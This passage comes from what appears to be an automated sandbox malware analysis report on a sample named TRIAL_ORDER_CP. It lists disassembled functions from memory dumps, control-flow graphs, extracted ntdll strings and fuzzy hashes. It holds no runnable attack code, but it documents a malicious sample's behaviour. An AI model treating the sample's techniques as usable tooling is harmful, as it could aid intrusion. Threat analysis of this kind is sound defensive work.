                                          control_flow_graph 1028 33bea1f0-33bea269 call 33b22330 * 2 RtlDebugPrintTimes 1034 33bea41f-33bea444 call 33b224d0 * 2 call 33b54b50 1028->1034 1035 33bea26f-33bea27a 1028->1035 1037 33bea27c-33bea289 1035->1037 1038 33bea2a4 1035->1038 1041 33bea28f-33bea295 1037->1041 1042 33bea28b-33bea28d 1037->1042 1039 33bea2a8-33bea2b4 1038->1039 1043 33bea2c1-33bea2c3 1039->1043 1045 33bea29b-33bea2a2 1041->1045 1046 33bea373-33bea375 1041->1046 1042->1041 1047 33bea2b6-33bea2bc 1043->1047 1048 33bea2c5-33bea2c7 1043->1048 1045->1039 1049 33bea39f-33bea3a1 1046->1049 1051 33bea2be 1047->1051 1052 33bea2cc-33bea2d0 1047->1052 1048->1049 1053 33bea3a7-33bea3b4 1049->1053 1054 33bea2d5-33bea2fd RtlDebugPrintTimes 1049->1054 1051->1043 1057 33bea3ec-33bea3ee 1052->1057 1058 33bea3da-33bea3e6 1053->1058 1059 33bea3b6-33bea3c3 1053->1059 1054->1034 1066 33bea303-33bea320 RtlDebugPrintTimes 1054->1066 1057->1049 1060 33bea3fb-33bea3fd 1058->1060 1062 33bea3cb-33bea3d1 1059->1062 1063 33bea3c5-33bea3c9 1059->1063 1064 33bea3ff-33bea401 1060->1064 1065 33bea3f0-33bea3f6 1060->1065 1067 33bea4eb-33bea4ed 1062->1067 1068 33bea3d7 1062->1068 1063->1062 1069 33bea403-33bea409 1064->1069 1070 33bea3f8 1065->1070 1071 33bea447-33bea44b 1065->1071 1066->1034 1076 33bea326-33bea34c RtlDebugPrintTimes 1066->1076 1067->1069 1068->1058 1073 33bea40b-33bea41d RtlDebugPrintTimes 1069->1073 1074 33bea450-33bea474 RtlDebugPrintTimes 1069->1074 1070->1060 1072 33bea51f-33bea521 1071->1072 1073->1034 1074->1034 1079 33bea476-33bea493 RtlDebugPrintTimes 1074->1079 1076->1034 1081 33bea352-33bea354 1076->1081 1079->1034 1088 33bea495-33bea4c4 RtlDebugPrintTimes 1079->1088 1082 33bea356-33bea363 1081->1082 1083 33bea377-33bea38a 1081->1083 1085 33bea36b-33bea371 1082->1085 1086 33bea365-33bea369 1082->1086 1087 33bea397-33bea399 1083->1087 1085->1046 1085->1083 1086->1085 1089 33bea38c-33bea392 1087->1089 1090 33bea39b-33bea39d 1087->1090 1088->1034 1094 33bea4ca-33bea4cc 1088->1094 1091 33bea3e8-33bea3ea 1089->1091 1092 33bea394 1089->1092 1090->1049 1091->1057 1092->1087 1095 33bea4ce-33bea4db 1094->1095 1096 33bea4f2-33bea505 1094->1096 1098 33bea4dd-33bea4e1 1095->1098 1099 33bea4e3-33bea4e9 1095->1099 1097 33bea512-33bea514 1096->1097 1100 33bea516 1097->1100 1101 33bea507-33bea50d 1097->1101 1098->1099 1099->1067 1099->1096 1100->1064 1102 33bea50f 1101->1102 1103 33bea51b-33bea51d 1101->1103 1102->1097 1103->1072
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: HEAP:
                                          • API String ID: 3446177414-2466845122
                                          • Opcode ID: e7cab79f66eb01bfd5a118d258371c8f3a00c811981132086eae35ae2aa512ca
                                          • Instruction ID: 3462d8143e4541115b09b4a2d97503c976361f1b546a3c763762a003943b9213
                                          • Opcode Fuzzy Hash: e7cab79f66eb01bfd5a118d258371c8f3a00c811981132086eae35ae2aa512ca
                                          • Instruction Fuzzy Hash: 24A17776A04321CFD704CE28D894A1ABBE9FF88354F194579E985EB320EB70ED45CB91
                                          Function 33B47550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                          Download Yara Rule
                                          Strings
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 33B84507
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 33B84592
                                          • Execute=1, xrefs: 33B8451E
                                          • ExecuteOptions, xrefs: 33B844AB
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 33B84530
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 33B84460
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 33B8454D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: e73e06b3fff1b77ee9d1a4012182f8ce6302a5112558337b5e7adf58d135e428
                                          • Instruction ID: 7e57bfcd6928067002cb10b7f32106077b88dd7a382b55720f5c890dafc1940c
                                          • Opcode Fuzzy Hash: e73e06b3fff1b77ee9d1a4012182f8ce6302a5112558337b5e7adf58d135e428
                                          • Instruction Fuzzy Hash: 91512471A00359BBEB109BA8DC96FED73ACEF08340F4404BAF515AB180EB709A41DF54
                                          Function 33803A59 Relevance: 13.8, Strings: 11, Instructions: 64COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972047929.0000000033800000.00000040.00001000.00020000.00000000.sdmp, Offset: 33800000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33800000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: A\G$CJA@$EPMK$EPMK$ETTH$LEJC$MGEP$PA\P$SAFT$THMG$THMG
                                          • API String ID: 0-799575282
                                          • Opcode ID: fb54952eba79a1746054eadf5c979e0c0428e6eec8eb07ef272fc66bf6309d23
                                          • Instruction ID: 3e2ca6ebfbd15d1a09338510eb13f61778ebfca1b692e4001204805fe2f73c20
                                          • Opcode Fuzzy Hash: fb54952eba79a1746054eadf5c979e0c0428e6eec8eb07ef272fc66bf6309d23
                                          • Instruction Fuzzy Hash: AE3122B090434DDACF25DF98D054ADEBBB1FF10348F828159E8696F201DBB58699CB89
                                          Function 33B2A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                          Download Yara Rule
                                          Strings
                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33B777E2
                                          • Actx , xrefs: 33B77819, 33B77880
                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33B77807
                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 33B777DD, 33B77802
                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 33B778F3
                                          • SsHd, xrefs: 33B2A304
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                          • API String ID: 0-1988757188
                                          • Opcode ID: 7d0fe05e88076cfcdbf9906444430e1888142919cca1d65f3a1a4db06256de11
                                          • Instruction ID: b6b3e4c76c3d86d6ed3097897ef219f2e6a50cf756c19f0e79db0013b44031b4
                                          • Opcode Fuzzy Hash: 7d0fe05e88076cfcdbf9906444430e1888142919cca1d65f3a1a4db06256de11
                                          • Instruction Fuzzy Hash: 22E18B74A04312CFE715CE24C890B6ABBE5FF85264F584B3DE8A9CB290DB31D945CB91
                                          Function 33B2D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • GsHd, xrefs: 33B2D794
                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33B79153
                                          • Actx , xrefs: 33B79315
                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33B79178
                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 33B7914E, 33B79173
                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 33B79372
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                          • API String ID: 3446177414-2196497285
                                          • Opcode ID: 7a68466e01ddd6906b90fafb9e35e05884bf0930c46b0b0eaca642f1e0eef7ea
                                          • Instruction ID: 4b8d99b213c72faed87919f3134bcee6a452e5da27e1a2b56e770483d76aa9cc
                                          • Opcode Fuzzy Hash: 7a68466e01ddd6906b90fafb9e35e05884bf0930c46b0b0eaca642f1e0eef7ea
                                          • Instruction Fuzzy Hash: 7EE18074A043519FE700CF14C880B4ABBE4FF88394F484A7DE9A9DB691D771D944CB92
                                          Function 33B0640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlDebugPrintTimes.NTDLL ref: 33B0651C
                                            • Part of subcall function 33B06565: RtlDebugPrintTimes.NTDLL ref: 33B06614
                                            • Part of subcall function 33B06565: RtlDebugPrintTimes.NTDLL ref: 33B0665F
                                          Strings
                                          • apphelp.dll, xrefs: 33B06446
                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 33B697B9
                                          • LdrpInitShimEngine, xrefs: 33B69783, 33B69796, 33B697BF
                                          • minkernel\ntdll\ldrinit.c, xrefs: 33B697A0, 33B697C9
                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 33B6977C
                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 33B69790
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-204845295
                                          • Opcode ID: 7ccbedb8be3ff4a69870a689a2e28ea5275b69e31e1b4e8f3ef441d99cf208c5
                                          • Instruction ID: 0fd7a3e6b1a89b0017b82e2fe421ec5d24dbe3a06367cb02a5d6c50836b5926f
                                          • Opcode Fuzzy Hash: 7ccbedb8be3ff4a69870a689a2e28ea5275b69e31e1b4e8f3ef441d99cf208c5
                                          • Instruction Fuzzy Hash: 8F51AEB56093449FE320DF24C891FABBBE8FB84648F40092AF99497561DB30DE05CF92
                                          Function 33B8FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                          • API String ID: 3446177414-4227709934
                                          • Opcode ID: 49a53442d4169cbd001ed84ab10852a8d427f4f556060d5265227fbc9eaa1afd
                                          • Instruction ID: 0389f07c0fc051387e77cef870d048aa0870b17e8ed74b455cb0d8fb8ea647ec
                                          • Opcode Fuzzy Hash: 49a53442d4169cbd001ed84ab10852a8d427f4f556060d5265227fbc9eaa1afd
                                          • Instruction Fuzzy Hash: 26416BB9A01299ABDB01DF98D980ADEBBB5FF88754F150229E854BB340D771DE01CB90
                                          Function 33BBF8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                          • API String ID: 3446177414-3492000579
                                          • Opcode ID: 58e1ecba36891039820f14b7941079c6ac38c6db86ec1cabead5a19b4e0b3b61
                                          • Instruction ID: ea4496394c34345cf3972b7c1053480facaec787bcb37134a95e2620623712e0
                                          • Opcode Fuzzy Hash: 58e1ecba36891039820f14b7941079c6ac38c6db86ec1cabead5a19b4e0b3b61
                                          • Instruction Fuzzy Hash: A771DB75901694AFCB15DFA8D490AAEFBF2FF49304F08826AE484AB651CB31D981CF50
                                          Function 33B06565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • LdrpLoadShimEngine, xrefs: 33B6984A, 33B6988B
                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33B69843
                                          • minkernel\ntdll\ldrinit.c, xrefs: 33B69854, 33B69895
                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33B69885
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-3589223738
                                          • Opcode ID: 7d4c1218349a7b6ddd2425da1dd49de0344c49a8f4675564b6ebe13228983c74
                                          • Instruction ID: 57fb437a1db3e4dc7c7af018a3c02f326fb0c7600bd7729fd75c83943e70d1e9
                                          • Opcode Fuzzy Hash: 7d4c1218349a7b6ddd2425da1dd49de0344c49a8f4675564b6ebe13228983c74
                                          • Instruction Fuzzy Hash: 8151D176A103A89FDB14EBA8C854F9DBBA6FB44348F05017AE450FB296DB70DC41CB90
                                          Function 33B3DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                          • API String ID: 3446177414-3224558752
                                          • Opcode ID: 8b9b6e1aad8e17d7ddc0c02e67e5c8c1414ca31c5ac03c1dfc7401f8091f7316
                                          • Instruction ID: 46edd873cc1413c904fc000dc525a80c86eead1276e75008fb3718a264c80819
                                          • Opcode Fuzzy Hash: 8b9b6e1aad8e17d7ddc0c02e67e5c8c1414ca31c5ac03c1dfc7401f8091f7316
                                          • Instruction Fuzzy Hash: C3416934A09764DFE301DF2CC544B4AB7A8FF81364F0886B9E96587691CB78E980CB95
                                          Function 33BBECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Entry Heap Size , xrefs: 33BBEDED
                                          • ---------------------------------------, xrefs: 33BBEDF9
                                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 33BBEDE3
                                          • HEAP: , xrefs: 33BBECDD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                          • API String ID: 3446177414-1102453626
                                          • Opcode ID: dadfed34a9a10c1a03fb07ce5da69c1e9dbe5be1b7ddd05cadc2164e819e98a8
                                          • Instruction ID: 59699024a4a69d43ed366aacbc5c5713912ea6601bfc4aef4d92a50b03558911
                                          • Opcode Fuzzy Hash: dadfed34a9a10c1a03fb07ce5da69c1e9dbe5be1b7ddd05cadc2164e819e98a8
                                          • Instruction Fuzzy Hash: 96418F39A00265DFCB09DF19D48096ABBF5EF49398B1A8579D444EB231DB71EC82CF90
                                          Function 33B3DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                          • API String ID: 3446177414-1222099010
                                          • Opcode ID: 6d0195c9997ed0ddbd554dfadbbcd7b3d2ff2f03949c030551fecf7c13c712f1
                                          • Instruction ID: b93173754b0613ef99fabeaadc3dc411a1bc592dede11c4c9b07a44076a2c695
                                          • Opcode Fuzzy Hash: 6d0195c9997ed0ddbd554dfadbbcd7b3d2ff2f03949c030551fecf7c13c712f1
                                          • Instruction Fuzzy Hash: F23159355027E4DFE712DB28C404F497BE8FF027A4F0409B9E8A147A62CBB5D981CB11
                                          Function 33B19046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$@
                                          • API String ID: 3446177414-1194432280
                                          • Opcode ID: 6e8d0e9b4a88940383d966f1c2bc246c77b21165e70f228e4e162b1973187fba
                                          • Instruction ID: 444056a2382b82c888eb6ad36d281b28c1da338207190145e207c47ab8d5bc01
                                          • Opcode Fuzzy Hash: 6e8d0e9b4a88940383d966f1c2bc246c77b21165e70f228e4e162b1973187fba
                                          • Instruction Fuzzy Hash: 528118B5D002699BDB25CF54CC44BDEB7B8EF48750F0441EAAA1AF7290D7709E858FA0
                                          Function 33B44C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • LdrpFindDllActivationContext, xrefs: 33B83440, 33B8346C
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 33B83466
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 33B83439
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 33B8344A, 33B83476
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 3446177414-3779518884
                                          • Opcode ID: 76e4c55a56aa1da6aaadfa4d886fb6fcca3a961d825e9759b650a39743c2c45e
                                          • Instruction ID: ca030319778f8902f5d169edbaac7109a8b876d1245e919c0481fccb28716d2d
                                          • Opcode Fuzzy Hash: 76e4c55a56aa1da6aaadfa4d886fb6fcca3a961d825e9759b650a39743c2c45e
                                          • Instruction Fuzzy Hash: 2031EBB6A003F1AFFB11AB08C844B55B2A8FB41394F4FC176D8446B153D7A1DDE0D699
                                          Function 33B0F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 3446177414-3610490719
                                          • Opcode ID: 2c91767a41dbe15f8b47f2dcbe5cd76b1f1145a5e7a6bc81ff25dfb353fddb43
                                          • Instruction ID: d903bed7391c5a38bec9024754502404996cb21fdb414d44110a349b3d964703
                                          • Opcode Fuzzy Hash: 2c91767a41dbe15f8b47f2dcbe5cd76b1f1145a5e7a6bc81ff25dfb353fddb43
                                          • Instruction Fuzzy Hash: 79910575B04750AFE315CB24C990F2ABBA9FF84B44F040679F9849B692DB34E845CF92
                                          Function 33B30AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • LdrpCheckModule, xrefs: 33B79F24
                                          • minkernel\ntdll\ldrinit.c, xrefs: 33B79F2E
                                          • Failed to allocated memory for shimmed module list, xrefs: 33B79F1C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-161242083
                                          • Opcode ID: 2583488a2b3671e93e6552894d40ddf40d705d02549f2e3387c49cb9dedad2da
                                          • Instruction ID: 0c82eeb7effb000683e4908ab1aaf3528bd4bd98a336935455692dfb34eaa27e
                                          • Opcode Fuzzy Hash: 2583488a2b3671e93e6552894d40ddf40d705d02549f2e3387c49cb9dedad2da
                                          • Instruction Fuzzy Hash: F271DF75E002649FEB04EF68C880EAEB7F4EF44218F094079E896EB651E734AD42CB50
                                          Function 33B3EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 13f374fea4c7a882b120c205387b085c0344686549c61dda959bafec1ae5744b
                                          • Instruction ID: 3cecd53217b9cce2f36557850a41b787336fab2fe7ea434c4637b1f875a68a72
                                          • Opcode Fuzzy Hash: 13f374fea4c7a882b120c205387b085c0344686549c61dda959bafec1ae5744b
                                          • Instruction Fuzzy Hash: 7DE11075E01728CFDB24CFA9D980A9DBBF5FF49360F24462AE495A7620DB70A841CF10
                                          Function 33BEA04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
